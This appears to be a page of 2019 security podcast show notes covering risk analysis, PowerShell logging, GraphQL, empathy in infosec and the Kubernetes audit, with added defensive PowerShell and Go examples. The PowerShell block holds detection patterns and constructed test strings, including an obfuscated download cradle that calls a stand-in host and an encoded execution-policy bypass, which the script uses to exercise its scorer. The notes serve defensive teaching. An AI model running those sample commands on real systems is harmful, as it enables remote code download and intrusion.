https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining

NordVPN users hit by credential stuffing (reused passwords, not a breach of NordVPN itself): https://arstechnica.com/information-technology/2019/11/nordvpn-users-passwords-exposed-in-mass-credential-stuffing-attacks/

Null sessions and how to avoid them: https://www.dummies.com/programming/networking/null-session-attacks-and-how-to-avoid-them/

https://social.technet.microsoft.com/Forums/en-US/2acdfb53-edee-444e-9ffa-25dcebcd9181/smb-null-sessions

Linux has a marketing problem:

https://hackaday.com/2019/10/31/linuxs-marketing-problem/

Compromising 20 high-profile maintainer accounts could reach half of the npm ecosystem

https://www.zdnet.com/article/hacking-20-high-profile-dev-accounts-could-compromise-half-of-the-npm-ecosystem/

Chrome 0day

https://thehackernews.com/2019/11/chrome-zero-day-update.html

Indian nuclear power plant confirms North Korean malware infection

https://arstechnica.com/information-technology/2019/10/indian-nuclear-power-company-confirms-north-korean-malware-attack/

High Tea Security Podcast: 

https://www.podcasts.com/high-tea-security-190182dc8

https://TAGNW.org - Bryan

Panel and talking about networking

Securewv.org - Training - https://www.eventbrite.com/e/security-dd-tickets-79219348203

Bsides Fredericton - https://www.eventbrite.ca/e/security-bsides-fredericton-2019-tickets-59449704667


Nov 04 2019

53mins

2019-038-Deveeshree_Nayak-risk_analysis, and OWASP WIA

OWASP WIA - https://www.youtube.com/watch?v=umnt0qbOPsE

https://www.owasp.org/index.php/Women_In_AppSec

OWASP Women in AppSec

Twitter: @2013_Nayak (reach out and ask to be added)

https://www.tagnw.org/events/

Risk in Infosec

Risk - a situation which involves extreme danger and an extensive amount of unrecovered loss

    What about risks that are positive in nature?  PMP calls them ‘opportunities’

Risk Analysis - systematic examination of the components and characteristics of risk

Analysis Steps - 

        Understanding and Assessment

            Understand there is a risk

            What if a company does not have security standards?

        Identification

            Identify and categorize risk - 

                Informational risk

                Network risk

                Hardware risk

                Software risk

                Environment risk?

https://en.wikipedia.org/wiki/Routine_activity_theory

            Scope of risk analysis?

            Threat modeling to find risks?

https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling

            SWOT (strength/weakness/opportunities/threats) analysis will discover risks?

            Risk analysis methodologies?

https://www.project-risk-manager.com/blog/qualitative-risk-techniques/

https://securityscorecard.com/blog/it-security-risk-assessment-methodology

https://en.wikipedia.org/wiki/Probabilistic_risk_assessment

https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration

        Estimation

            Chance that risk will occur (once a decade, once a week)

            Design controls to remediate

        Implementation

            Risk assessment is a combined approach

            Combined approach for a risk analysis

                You mentioned a lot of people, what’s the scope?

                How do you do the risk assessment? Framework?

        Evaluation

            Evaluation approach

                Like an agile approach

            Provides an informed conclusion

            Report must be clear (no jargon)

        Decision Making

Examples to Reduce Risk

Training and education

    what kind of testing? Annual Security training?

Publishing policies

Agreement with organization

    BAA with 3rd parties

Timely testing - 

Oct 30 2019

1hr 16mins

2019-038- Ethical dilemmas with offensive tools, powershell discussion with Lee Holmes - Part2

Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s

Encarta - https://en.wikipedia.org/wiki/Encarta

Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409

Congrats on the black badge :)

I like that you bring up execution policies, and that they were never created to be a security control

  • I started alerting on it anyway at least from non-admin devices

https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/

Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/

Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark

You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.

Powershell slime trail <3 (powershell transparency)

“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”

If an attacker is going to use powershell, let’s make them regret it

Powershell has had quite an impact and history.

My own sorry logging/alerting attempts

You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?

Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Revoke-Obfuscation

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A

Ever thought of writing a PowerShell security-centric book? Bill Pollock was looking for someone to write a book for No Starch…

Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes

AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 -  Windows Powershell cookbook

Eric Conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html

https://github.com/sans-blue-team/DeepBlueCLI

Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE

https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense

Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN

https://github.com/infosecn1nja/AD-Attack-Defense

Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa

@Lee_Holmes

@hackershealth

@log-md

@infosecCampout

@seasecEast

@brakesec

@bryanbrake

@boettcherpwned

@Infosystir

@packscott

@dpcybuck

@megan_roddie

@consultingCSO

Oct 22 2019

52mins

2019-037-Lee Holmes, Powershell logging, and why there's an 'execution bypass'

Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s

Encarta - https://en.wikipedia.org/wiki/Encarta

Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409

Congrats on the black badge :)

I like that you bring up execution policies, and that they were never created to be a security control

  • I started alerting on it anyway at least from non-admin devices

https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/

Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/

Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark

You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.

Powershell slime trail <3 (powershell transparency)

“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”

If an attacker is going to use powershell, let’s make them regret it

Powershell has had quite an impact and history.

My own sorry logging/alerting attempts

You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?

Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Revoke-Obfuscation

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A

Ever thought of writing a PowerShell security-centric book? Bill Pollock was looking for someone to write a book for No Starch…

Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes

AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 -  Windows Powershell cookbook

Eric Conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html

https://github.com/sans-blue-team/DeepBlueCLI

Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE

https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense

Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN

https://github.com/infosecn1nja/AD-Attack-Defense
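The notes for both Lee Holmes episodes circle the same three points: execution policy was never a security control, PowerShell can be made to leave a "slime trail" the defender can read, and obfuscation (Revoke-Obfuscation) is detectable from the shape of the code. The script below is an added example written for this page; it is not code from the podcast, from Lee Holmes or from Microsoft. It assumes Windows PowerShell 5.1 and an elevated session for the registry writes, and the transcript directory and the three sample script blocks are constructed for the demo.

```powershell
# Added example for the Lee Holmes episodes above. Not code from the podcast, from Lee Holmes or
# from Microsoft. Assumptions: Windows PowerShell 5.1, an elevated session for the registry
# writes, and the constructed transcript path below (in production, use a write-only share).

# --- 1. Execution policy is not a security boundary -----------------------------------------
# Each shape below runs a script whatever Get-ExecutionPolicy says. Since the policy was never a
# control, the useful move is to log and alert on these shapes rather than rely on the policy.
$BypassPatterns = @(
    '-(?:ExecutionPolicy|ex|exec|ep)\s+(?:Bypass|Unrestricted)'   # powershell -ep bypass
    '-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}'          # powershell -enc <base64>
    'Get-Content\s+\S+\.ps1\s*\|\s*(?:powershell|pwsh)'            # pipe the file into a new host
    '\b(?:Invoke-Expression|iex)\b'                                # run text as code
    'Net\.WebClient|DownloadString\(|Invoke-WebRequest'            # download cradle
)

# --- 2. Turn on the slime trail: script block, module and transcription logging --------------
function Enable-PowerShellDeepLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # constructed path
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'   # same keys Group Policy writes
    foreach ($sub in 'ScriptBlockLogging', 'ModuleLogging', 'ModuleLogging\ModuleNames', 'Transcription') {
        New-Item -Path "$base\$sub" -Force | Out-Null
    }
    Set-ItemProperty "$base\ScriptBlockLogging"        -Name EnableScriptBlockLogging -Value 1 -Type DWord
    Set-ItemProperty "$base\ModuleLogging"             -Name EnableModuleLogging      -Value 1 -Type DWord
    Set-ItemProperty "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String   # every module
    Set-ItemProperty "$base\Transcription" -Name EnableTranscripting    -Value 1 -Type DWord
    Set-ItemProperty "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty "$base\Transcription" -Name OutputDirectory -Value $TranscriptDir -Type String
}

# --- 3. Revoke-Obfuscation style scoring of one script block ---------------------------------
function Get-ScriptBlockSuspicionScore {
    param([Parameter(Mandatory)][string]$Text)
    $score = 0
    $why = New-Object System.Collections.Generic.List[string]
    foreach ($p in $BypassPatterns) {
        if ($Text -match $p) { $score += 3; $why.Add("matches $p") }
    }
    # Obfuscated PowerShell leans on backticks, string splicing, [char] casts and -f/-join
    # reassembly far more than admin scripts do; these are the cheap version of the
    # character-frequency features in the Revoke-Obfuscation paper linked above.
    $len    = [Math]::Max($Text.Length, 1)
    $ticks  = [regex]::Matches($Text, '`').Count
    $splice = [regex]::Matches($Text, '[''"]\s*\+\s*[''"]').Count
    $casts  = [regex]::Matches($Text, '\[char\]', 'IgnoreCase').Count
    if ($ticks / $len -gt 0.01) { $score += 2; $why.Add("backtick ratio $([Math]::Round($ticks / $len, 3))") }
    if ($splice -ge 3)          { $score += 2; $why.Add("$splice string splices") }
    if ($casts -ge 3)           { $score += 2; $why.Add("$casts [char] casts") }
    if ($Text -match 'FromBase64String|-join|\{\d+\}\s*["'']?\s*-f|\.Reverse\(\)') {
        $score += 1; $why.Add('decode/reassemble primitives')
    }
    [pscustomobject]@{
        Score   = $score
        Reasons = ($why -join '; ')
        Snippet = $Text.Substring(0, [Math]::Min(70, $Text.Length))
    }
}

# --- 4. Hunt the 4104 events that script block logging produces ------------------------------
function Get-SuspiciousScriptBlock {
    param([int]$MaxEvents = 1000, [int]$Threshold = 4)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object {
            # Properties[2] is ScriptBlockText; long blocks arrive split over several 4104 records
            $r = Get-ScriptBlockSuspicionScore -Text ([string]$_.Properties[2].Value)
            if ($r.Score -ge $Threshold) {
                $r | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru
            }
        }
}

# --- 5. Baseline check: is this user constrained at all? -------------------------------------
# FullLanguage for a standard user means no AppLocker/WDAC policy is putting PowerShell into
# Constrained Language Mode, so nothing stops [Reflection] or Add-Type tricks.
"LanguageMode: $($ExecutionContext.SessionState.LanguageMode)"

# Constructed samples to exercise the scorer offline (the base64 is UTF-16LE "IEX (New").
$constructedSamples = @(
    'Get-ChildItem C:\Users | Where-Object { $_.PSIsContainer }'
    'powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AA=='
    '&("{1}{0}" -f ''EX'',''I'') ([char]105+[char]101+[char]120); $c=''Net''+''.Web''+''Cli''+''ent''; `i`e`x (New-Object $c).DownloadString(''http://example.invalid/x'')'
)
$constructedSamples | ForEach-Object { Get-ScriptBlockSuspicionScore -Text $_ } | Format-Table Score, Reasons -AutoSize
```

Run Enable-PowerShellDeepLogging once from an elevated prompt (in a domain, set the same values through Group Policy instead, since GPO will overwrite local registry edits), then schedule Get-SuspiciousScriptBlock against the Operational log. Note that PowerShell 5 already writes warning-level 4104 records for script blocks containing Microsoft's built-in list of suspicious keywords even before the policy is enabled, so the hunt has something to chew on from day one; full script block logging is what turns that trickle into the complete trail the notes above call for.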

Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa

@Lee_Holmes

@hackershealth

@log-md

@infosecCampout

@seasecEast

@brakesec

@bryanbrake

@boettcherpwned

@Infosystir

@packscott

@dpcybuck

@megan_roddie

@consultingCSO

Oct 17 2019

50mins

Play

2019-036-RvrShell-graphql_defense-Part2

Secure Python course: 

https://brakesec.com/brakesecpythonclass

PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing

GraphQL High Level

https://graphql.org/

Designed to replace REST architecture

Allows you to make one large request; uses a query language

Released by Facebook in 2012

JSON 

Learn Enough to be dangerous

https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2

WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315

Vulns in the Wild

Abusing GraphQL 

OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html

Attack Techniques

https://www.apollographql.com/docs/apollo-server/data/data/

https://github.com/graphql/graphiql

Protecting GraphQL

https://github.com/maticzav/graphql-shield

Magento 2 (runs GraphQL), hard to update…

https://github.com/szski/shapeshifter - Matt’s tool, Shapeshifter

GraphQL implementations inside (ecosystem packages?)

Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)

Patreon supporters  (Josh P and David G)

Teepub: https://www.teepublic.com/user/bdspodcast

For Amanda next:

https://www.cybercareersummit.com/

& keynote @grrcon oct 24/25

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!: https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Oct 09 2019

57mins

2019-035-Matt_szymanski-attack and defense of GraphQL-Part1

Derbycon Discussion (bring Matt in)

Python course: 

https://brakesec.com/brakesecpythonclass

PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing

GraphQL High Level

https://graphql.org/

Designed to replace REST architecture

Allows you to make one large request; uses a query language

Released by Facebook in 2012

JSON 

Learn Enough to be dangerous

https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2

WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315

Vulns in the Wild

Abusing GraphQL 

OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html

Attack Techniques

https://www.apollographql.com/docs/apollo-server/data/data/

https://github.com/graphql/graphiql

Protecting GraphQL

https://github.com/maticzav/graphql-shield

Magento 2 (runs GraphQL), hard to update…

https://github.com/szski/shapeshifter - Matt’s tool, Shapeshifter

GraphQL implementations inside (ecosystem packages?)

Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)

Patreon supporters  (Josh P and David G)

Teepub: https://www.teepublic.com/user/bdspodcast

For Amanda next:

https://www.cybercareersummit.com/

& keynote @grrcon oct 24/25

Oct 02 2019

42mins

2019-034- Tracy Maleeff, empathy as a service, derbycon discussion

Podcast Interview (Youtube): https://youtu.be/4tdJwBMh3ow

Tracy Maleeff (pronounced like may-leaf) - https://twitter.com/InfoSecSherpa

https://medium.com/@InfoSecSherpa

https://nuzzel.com/InfoSecSherpa

Python secure coding class - November 2nd / 5 Saturdays, @nxvl teaching

https://www.eventbrite.com/e/secure-python-coding-with-nicolas-valcarcel-registration-72804597511

Derbycon Talk: https://www.youtube.com/watch?v=KILlp4KMIPA

Plugs:

Nuzzel newsletter: https://nuzzel.com/infosecsherpa

OSINT-y Goodness blog: https://medium.com/@infosecsherpa

Tomato pie: 

https://www.eater.com/2016/8/19/12525602/tomato-pie-philadelphia-new-jersey

Infosec is a service industry job (gasp!)

Customer service is an attitude, not a department

Reference Interview: https://en.wikipedia.org/wiki/Reference_interview

Approachability

    Does your org make it easy to contact you?

    What is your tone of writing?

    What does your outgoing communication look like?

    Rein in your attitude, language, etc…

“I am using an online translator” (great idea!)

What is your department’s reputation?

    Create an assessment of your department…

“I didn’t know there was humans in security?” --

Interest

    Be interested in solving the problem.

    Make interaction a ‘safe space’

        No judging, mocking

    LOL, “EE Cummings”

https://poets.org/poem/amores-i

Listening

    Pay attention to what the end user doesn’t say.

    Don’t interrupt the end user

Interviewing

    Repeat back what the user said or asked

    Tone: Ask clarification questions, not accusatory questions

Searching

    Did security fail the user?

Answering

    Teachable moments

        Building trust/relationship equity

        “While you’re on the phone…”

    “Thank you for your time”

Follow-Up

    Think of ways to create a culture of security

    Create canned emails

    Random acts of kindness

        cyberCupcakes!!!! Or potentially small-value gift cards (?)

    Kindness as currency

        Christmas cookies 

            Spreading goodwill

        building relationship equity

            Reciprocity 

        Lunch and learns

People can’t be educated into vaccinations, but behavioral nudges help

    “Telling people facts won’t change behavior”

Sep 22 2019

1hr 23mins

2019-033-Part 2 of the Kubernetes security audit discussion (Jay Beale & Aaron Small)

Topics: Infosec Campout report

Jay Beale (co-lead for audit) *Bust-a-Kube*  

Aaron Small (product mgr at GKE/Google)

Atredis Partners

Trail of Bits

What was the Audit? 

How did it come about? 

Who were the players?

    Kubernetes Working Group

        Aaron, Craig, Jay, Joel

    Outside vendors:

        Atredis: Josh, Nathan Keltner

        Trail of Bits: Stefan Edwards, Bobby Tonic, Dominik

    Kubernetes Project Leads/Devs

        Interviewed devs -- this was much of the info that went into the threat model

        Rapid Risk Assessments - let’s put the GitHub repository in the show notes

What did it produce?

    Vuln Report

    Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf

    White Papers

https://github.com/kubernetes/community/tree/master/wg-security-audit/findings

    Discuss the results:

        Threat model findings

            Controls silently fail, leading to a false sense of security

                Pod Security Policies, Egress Network Rules

            Audit model isn’t strong enough for non-repudiation

                By default, API server doesn’t log user movements through system

            TLS Encryption weaknesses

                Most components accept cleartext HTTP

                Bootstrapping to add Kubelets is particularly weak

                Multiple components do not check certificates and/or use self-signed certs

                HTTPS isn’t enforced

                Certificates are long-lived, with no revocation capability

                Etcd doesn’t authenticate connections by default

            Controllers all Bundled together

                Confused deputy: lower-privilege controllers are bundled in the same binary as higher-privilege ones

            Secrets not encrypted at rest by default

            Etcd doesn’t have signatures on its write-ahead log

            DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes

            Port 10255 has an unauthenticated HTTP server for status and health checking

        Vulns / Findings (not complete list, but interesting)

            Hostpath pod security policy bypass via persistent volumes

            TOCTOU when moving PID to manager’s group

            Improperly patched directory traversal in kubectl cp

            Bearer tokens revealed in logs

            Lots of MitM risk:

            SSH not checking fingerprints: InsecureIgnoreHostKey

            gRPC transport seems all set to WithInsecure()

            HTTPS connections not checking certs

            Some HTTPS connections are unauthenticated

            Output encoding on JSON construction

                This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.

            Non-constant time check on passwords

            Lack of re-use / library-ification of code

    Who will use these findings and how? Devs, google, bad guys? 

    Any new audit tools created from this? 

Brad Geesaman, “Hacking and Hardening Kubernetes Clusters by Example [I]” (Symantec): https://www.youtube.com/watch?v=vTgQLzeBfRU

Aaron Small: 

https://cloud.google.com/blog/products/gcp/precious-cargo-securing-containers-with-kubernetes-engine-18

https://cloud.google.com/blog/products/gcp/exploring-container-security-running-a-tight-ship-with-kubernetes-engine-1-10

https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster

CNCF:  https://www.youtube.com/watch?v=90kZRyPcRZw

Findings:

Scope for testing:

Source code review (what languages did they have to review?)

    Golang, shell, ...

Networking (discuss the networking: *internal* and *external*)

Cryptography (TLS, data stores)

AuthN/AuthZ 

RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)

Secrets

Namespace traversals

Namespace claims

Methodology:

Set up a bunch of environments?

Primarily set up a single environment IIRC

Combination of code audit and active ?fuzzing?

What does one fuzz on a K8s environment?

Tested with latest alpha or production versions?

Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.

Tested multiple different types of k8s implementations?

Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)

Bug Bounty program:

https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md

Sep 16 2019

44mins

the last Derbycon Brakesec podcast

This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, and Gary Rimar (piano player extraordinaire) talks about @litmoose's talk on how to tell C-levels that their applications aren't good.

We also got asked about how the show came about, and how we found each other.

Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...

Sep 07 2019

50mins

2019-032-kubernetes security audit discussion with Jay Beale and Aaron Small

Topics: Infosec Campout report

Derbycon Pizza Party (with podcast show!) - https://www.eventbrite.com/e/brakesec-pizza-party-at-the-derbycon-mental-health-village-tickets-69219271705

Mental health village at Derbycon

Jay Beale (co-lead for audit) *Bust-a-Kube*  

Aaron Small (product mgr at GKE/Google)

Atredis Partners

Trail of Bits

What was the Audit? 

How did it come about? 

Who were the players?

    Kubernetes Working Group

        Aaron, Craig, Jay, Joel

    Outside vendors:

        Atredis: Josh, Nathan Keltner

        Trail of Bits: Stefan Edwards, Bobby Tonic, Dominik

    Kubernetes Project Leads/Devs

        Interviewed devs -- this was much of the info that went into the threat model

        Rapid Risk Assessments - let’s put the GitHub repository in the show notes

What did it produce?

    Vuln Report

    Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf

    White Papers

https://github.com/kubernetes/community/tree/master/wg-security-audit/findings

    Discuss the results:

        Threat model findings

            Controls silently fail, leading to a false sense of security

                Pod Security Policies, Egress Network Rules

            Audit model isn’t strong enough for non-repudiation

                By default, API server doesn’t log user movements through system

            TLS Encryption weaknesses

                Most components accept cleartext HTTP

                Bootstrapping to add Kubelets is particularly weak

                Multiple components do not check certificates and/or use self-signed certs

                HTTPS isn’t enforced

                Certificates are long-lived, with no revocation capability

                Etcd doesn’t authenticate connections by default

            Controllers all Bundled together

                Confused deputy: lower-privilege controllers are bundled in the same binary as higher-privilege ones

            Secrets not encrypted at rest by default

            Etcd doesn’t have signatures on its write-ahead log

            DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes

            Port 10255 has an unauthenticated HTTP server for status and health checking

        Vulns / Findings (not complete list, but interesting)

            Hostpath pod security policy bypass via persistent volumes

            TOCTOU when moving PID to manager’s group

            Improperly patched directory traversal in kubectl cp

            Bearer tokens revealed in logs

            Lots of MitM risk:

            SSH not checking fingerprints: InsecureIgnoreHostKey

            gRPC transport seems all set to WithInsecure()

            HTTPS connections not checking certs

            Some HTTPS connections are unauthenticated

            Output encoding on JSON construction

                This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.

            Non-constant time check on passwords

            Lack of re-use / library-ification of code
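Two of the findings listed above, the non-constant-time password check and the HTTPS connections that never check certificates, are easy to recognise in Go code once the pattern is known. The block below is an added example, not code from the audit report or from the Kubernetes code base, and it illustrates the same findings list in both Kubernetes audit episodes: `leakyEqual` is the flawed early-exit comparison, `safeEqual` is the constant-time form from Go's standard `crypto/subtle`, and `AuditTLSConfig` is a hypothetical helper (not a Go or Kubernetes API) that flags a `tls.Config` with verification disabled, no pinned minimum version, or, on the server side, no client-certificate requirement. The sample secret and configs are constructed for the demonstration.

```go
// Added example: the "non-constant time check on passwords" and
// "HTTPS connections not checking certs" findings, shown as the flawed
// pattern beside the fix. Not from the audit report or the Kubernetes code.
package main

import (
	"crypto/subtle"
	"crypto/tls"
	"fmt"
)

// leakyEqual is the flawed pattern, kept only as the "before": it returns
// at the first differing byte, so the time taken grows with the length of
// the matching prefix and timing measurements across many attempts leak
// information about the secret.
func leakyEqual(secret, guess []byte) bool {
	if len(secret) != len(guess) {
		return false
	}
	for i := range secret {
		if secret[i] != guess[i] {
			return false
		}
	}
	return true
}

// safeEqual is the fix: subtle.ConstantTimeCompare touches every byte
// regardless of where a mismatch sits and returns 0 when the lengths
// differ, so the timing does not depend on the secret's contents.
func safeEqual(secret, guess []byte) bool {
	return subtle.ConstantTimeCompare(secret, guess) == 1
}

// AuditTLSConfig is a hypothetical helper (not a Go or Kubernetes API) that
// reports, for one tls.Config, the weaknesses the audit's TLS section lists:
// peer certificates not checked, no minimum protocol version pinned, and,
// for a server, no client-certificate requirement. A nil config is treated
// as Go's zero-value Config, which verifies peers but pins nothing.
func AuditTLSConfig(cfg *tls.Config, isServer bool) []string {
	if cfg == nil {
		cfg = &tls.Config{}
	}
	var findings []string
	if cfg.InsecureSkipVerify {
		findings = append(findings, "InsecureSkipVerify set: peer certificate is never verified (MitM risk)")
	}
	if cfg.MinVersion < tls.VersionTLS12 {
		findings = append(findings, "MinVersion not pinned to TLS 1.2 or newer")
	}
	if isServer && cfg.ClientAuth != tls.RequireAndVerifyClientCert {
		findings = append(findings, "server does not require and verify client certificates (no mutual TLS)")
	}
	return findings
}

func main() {
	// Constructed sample values, not real credentials.
	stored := []byte("correct horse battery staple")
	fmt.Println("leakyEqual, wrong guess:", leakyEqual(stored, []byte("correct horse battery stapled")))
	fmt.Println("safeEqual, right guess: ", safeEqual(stored, []byte("correct horse battery staple")))

	// The weak client config beside the hardened one.
	weak := &tls.Config{InsecureSkipVerify: true}
	hardened := &tls.Config{MinVersion: tls.VersionTLS12}
	fmt.Println("weak client findings:    ", AuditTLSConfig(weak, false))
	fmt.Println("hardened client findings:", AuditTLSConfig(hardened, false))

	// A server that never asks the peer for a certificate.
	server := &tls.Config{MinVersion: tls.VersionTLS13}
	fmt.Println("server findings:         ", AuditTLSConfig(server, true))
}
```

Run it with `go run` and the weak client config produces two findings while the hardened one produces none; the server config with no `ClientAuth` setting is reported even though its protocol version is pinned, which is the point of the audit's note that most components will happily talk to an unauthenticated peer.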

    Who will use these findings and how? Devs, google, bad guys? 

    Any new audit tools created from this? 

Brad Geesaman, “Hacking and Hardening Kubernetes Clusters by Example [I]” (Symantec): https://www.youtube.com/watch?v=vTgQLzeBfRU

Aaron Small: 

https://cloud.google.com/blog/products/gcp/precious-cargo-securing-containers-with-kubernetes-engine-18

https://cloud.google.com/blog/products/gcp/exploring-container-security-running-a-tight-ship-with-kubernetes-engine-1-10

https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster

CNCF:  https://www.youtube.com/watch?v=90kZRyPcRZw

Findings:

Scope for testing:

Source code review (what languages did they have to review?)

    Golang, shell, ...

Networking (discuss the networking: *internal* and *external*)

Cryptography (TLS, data stores)

AuthN/AuthZ 

